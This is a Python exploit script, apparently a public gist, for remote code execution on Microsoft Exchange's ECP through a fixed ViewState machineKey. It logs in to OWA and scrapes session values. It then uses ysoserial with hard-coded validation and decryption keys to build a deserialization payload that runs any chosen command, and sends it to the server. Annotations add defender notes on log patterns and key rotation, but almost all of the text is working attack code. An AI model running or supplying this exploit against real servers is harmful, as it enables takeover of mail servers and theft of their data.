@exploitio
Created March 30, 2020 18:50
# encoding: UTF-8
import requests
import argparse
import re
import sys
import os
import urllib3
from urllib.parse import urlparse
from urllib.parse import quote
# Silences urllib3's InsecureRequestWarning. Every request in this script is
# sent with verify=False, so TLS certificate errors are accepted silently and
# never surfaced to the operator.
urllib3.disable_warnings()
# Directory expected to contain ysoserial.exe, resolved next to this script.
# The trailing "/" matters: ysoserial() builds its command line by plain
# string concatenation onto this value.
ysoserial_path = os.path.abspath(os.path.dirname(__file__))+"/ysoserial/"
# A single session for the whole run so the cookies set by the OWA login in
# get_value() are reused by the later /ecp requests.
session = requests.Session()
def get_value(url: str, user: str, pwd: str) -> tuple[str, str | None, str]:
    """Log in to OWA and collect the values main() needs for the ViewState request.

    Args:
        url: OWA URL from the command line; only its scheme and host are used
            to build ``base_url``, the full URL is echoed back as the
            ``destination`` form field.
        user: Domain login sent as the ``username`` form field.
        pwd: Password sent as the ``password`` form field.

    Returns:
        ``(view, key, base_url)`` -- the ``__VIEWSTATEGENERATOR`` scraped from
        ``/ecp/default.aspx`` (or the hard-coded fallback), the
        ``ASP.NET_SessionId`` cookie value (``None`` when the session has no
        such cookie), and the ``scheme://host`` prefix.

    Side effects:
        Authenticates on the module-level ``session`` (its cookie jar is read
        afterwards) and calls ``sys.exit(1)`` when the login fails or raises.

    Defender note: the observable footprint of this function is a POST to
    ``/owa/auth.owa`` immediately followed by a GET of ``/ecp/default.aspx``
    from the same client, with a fixed Firefox 73 User-Agent string.
    """
    print("[*] Tring to login owa...")
    tmp = urlparse(url)
    base_url = "{}://{}".format(tmp.scheme, tmp.netloc)
    # Form body for the OWA login page. The ""+x+"" wrapping is a no-op
    # string concatenation; the values are sent unchanged.
    paramsPost = {
        "password": ""+pwd+"",
        "isUtf8": "1",
        "passwordText": "",
        "trusted": "4",
        "destination": ""+url+"",
        "flags": "4",
        "forcedownlevel": "0",
        "username": ""+user+""
    }
    # Browser-like headers. Note the cookies are sent via an explicit Cookie
    # header here, not through the requests cookie mechanism.
    headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0",
        "Connection": "close",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": "PrivateComputer=true; PBack=0"
    }
    # NOTE: this dict is never passed to any request; the same two cookies
    # already travel in the Cookie header above, so it is dead data.
    cookies = {
        "PBack": "0",
        "PrivateComputer": "true"
    }
    login_url = base_url + '/owa/auth.owa'
    print("[+] Login url: {}".format(login_url))
    try:
        # verify=False: certificate validation is disabled for this request.
        login = session.post(login_url, data=paramsPost, headers=headers, verify=False, timeout=30)
        print("[*] Status code: %i" % login.status_code)
        # Precedence caveat: ``and`` binds tighter than ``or``, so this reads as
        # ``"reason=" in login.text or ("reason=" in login.url and "owaLoading"
        # in login.text)``. The failure test is therefore driven mostly by the
        # response body containing "reason=".
        if "reason=" in login.text or "reason=" in login.url and "owaLoading" in login.text:
            print("[!] Login Incorrect, please try again with a different account..")
            # SystemExit is not an Exception subclass, so the handler below
            # does not intercept this exit.
            sys.exit(1)
    except Exception as e:
        # Any transport/parse error (timeout, connection refused, ...) ends the run.
        print("[!] login error , error: {}".format(e))
        sys.exit(1)
    print("[+] Login successfully! ")
    try:
        print("[*] Tring to get __VIEWSTATEGENERATOR...")
        target_url = "{}/ecp/default.aspx".format(base_url)
        new_response = session.get(target_url, verify=False, timeout=15)
        # First match of the hidden form field; [0] raises IndexError when the
        # page has no such field, which is caught by the bare except below.
        view = re.compile(
            'id="__VIEWSTATEGENERATOR" value="(.+?)"').findall(str(new_response.text))[0]
        print("[+] Done! __VIEWSTATEGENERATOR:{}".format(view))
    except:
        # Bare except: also swallows KeyboardInterrupt/SystemExit raised inside
        # the try block, and hides the real reason the scrape failed (network
        # error vs. missing field). Falls back to a hard-coded generator value.
        view = "B97B4E27"
        print("[*] Can't get __VIEWSTATEGENERATOR, use default value: {}".format(view))
    try:
        print("[*] Tring to get ASP.NET_SessionId....")
        # Read from the session's cookie jar populated by the requests above.
        key = session.cookies['ASP.NET_SessionId']
        print("[+] Done! ASP.NET_SessionId: {}".format(key))
    except Exception as e:
        # Despite the "[*] Exit.." message this branch does not exit; it
        # returns key=None and leaves the decision to the caller.
        key = None
        print("[!] Get ASP.NET_SessionId error, error: {} \n[*] Exit..".format(e))
    return view, key, base_url
def ysoserial(cmd: str) -> str:
    """Run *cmd* from the ysoserial directory and return the last line it printed.

    The command text is prefixed with the module-level ``ysoserial_path`` and
    executed through ``os.popen``, i.e. it goes through the shell exactly as
    given; nothing is quoted or validated here, the caller owns the full
    command line. Returns the final stdout line, trailing newline included.
    Raises ``IndexError`` when the tool produces no stdout at all (e.g. the
    executable is missing, in which case the shell error goes to stderr).
    """
    full_command = "".join((ysoserial_path, cmd))
    # Closing the pipe via the context manager also reaps the child process.
    with os.popen(full_command) as pipe:
        output_lines = pipe.readlines()
    return output_lines[-1]
def main() -> None:
    """Parse arguments, log in, build a signed ViewState blob and submit it.

    Flow: ``get_value`` logs in to OWA and scrapes ``__VIEWSTATEGENERATOR`` and
    ``ASP.NET_SessionId``; ``ysoserial`` then produces a ViewState payload
    signed with the fixed validation key below (optionally also encrypted
    with the fixed decryption key), which is sent to ``/ecp/default.aspx`` as
    the ``__VIEWSTATE`` query parameter. An HTTP 500 is reported as a
    probable success; any other status prints nothing.

    Defender notes: the payload is accepted only where the server's ViewState
    validation/decryption keys equal the constants hard-coded here, i.e. the
    weakness exploited is a non-unique machineKey -- a per-installation,
    rotated machineKey invalidates these signatures. In web-server logs the
    sequence POST /owa/auth.owa -> GET /ecp/default.aspx -> GET
    /ecp/default.aspx?...&__VIEWSTATE=<very long value> answered with 500 is
    the pattern to alert on.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--server", required=True, help="ECP Server URL: http://ip/owa")
    parser.add_argument("-u", "--user", required=True, help="Domain Login: domain\\user")
    parser.add_argument("-p", "--password", required=True, help="Domain Password")
    parser.add_argument("-c", "--cmd", help="Command to EXEC", required=True)
    parser.add_argument("-e", "--encrypt", help="Encrypt the payload", action='store_true',default=False)
    args = parser.parse_args()
    url = args.server
    print("[*] Start to exploit..")
    user = args.user
    pwd = args.password
    command = args.cmd
    view, key, base_url = get_value(url, user, pwd)
    if key is None:
        # Dead assignment: sys.exit(1) follows immediately, so 'test' is never
        # used. The run stops when no ASP.NET_SessionId cookie was obtained.
        key = 'test'
        sys.exit(1)
    # Command line for ysoserial.exe. Only --generator and --viewstateuserkey
    # come from the target; the algorithm, validation key, gadget and legacy
    # flags are constants. ``command`` is interpolated into a shell string
    # inside double quotes with no escaping, so quotes or shell metacharacters
    # in -c break (or alter) the command line.
    ex_payload = """ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{}" --viewstateuserkey="{}" --islegacy --isdebug""".format(command,view,key)
    if args.encrypt:
        # Encrypted variant: adds the fixed 3DES decryption key and asks
        # ysoserial to emit an encrypted ViewState.
        ex_payload = ex_payload + ' --decryptionalg="3DES" --decryptionkey="E9D2490BD0075B51D1BA5288514514AF" --isencrypted'
    print("\n"+ex_payload)
    out_payload = ysoserial(ex_payload)
    if args.encrypt:
        # Encrypted ViewState is flagged with an empty __VIEWSTATEENCRYPTED
        # parameter and no generator value.
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEENCRYPTED=&__VIEWSTATE={}".format(base_url, quote(out_payload))
    else:
        final_exp = "{}/ecp/default.aspx?__VIEWSTATEGENERATOR={}&__VIEWSTATE={}".format(base_url, view, quote(out_payload))
    print("\n[+] Exp url: {}".format(final_exp))
    print("\n[*] Auto trigger payload..")
    # Sent on the logged-in session; verify=False again disables TLS checks.
    status = session.get(final_exp,verify=False,timeout=15)
    if status.status_code==500:
        # A 500 is the only signal examined; success is inferred, not confirmed.
        print("[*] Status code: %i, Maybe success!" % status.status_code)
# Script entry point; importing the module only defines the helpers.
if __name__ == "__main__":
    main()